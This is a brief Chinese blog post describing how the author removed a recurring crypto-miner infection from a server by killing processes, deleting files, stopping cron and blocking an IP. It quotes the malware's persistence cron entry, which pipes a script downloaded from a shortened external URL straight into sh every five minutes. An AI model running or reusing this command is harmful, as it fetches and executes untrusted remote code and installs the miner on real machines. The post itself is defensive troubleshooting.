以下是进程和挖矿文件:
自己写脚本杀掉所有进程并删掉源文件。
发现刚执行完脚本,进程又出现一大堆;源文件和进程都干掉了,哪儿执行的命令呢?
定时任务中,发现会定时远程下载脚本
*/5 * * * * curl -sL https://lnk0.com/BtoUt4 | sh删掉定时任务,发现整个世界清静了。
但是,没过多久,又有了,真是防不胜防(烦不胜烦)。
于是再把定时任务服务停掉,远程下载脚本ip禁用。这次跑了一个晚上都没有再出现了。
[参考]:https://www.v2ex.com/t/447200#reply32
扫描二维码关注公众号,回复:
91807 查看本文章
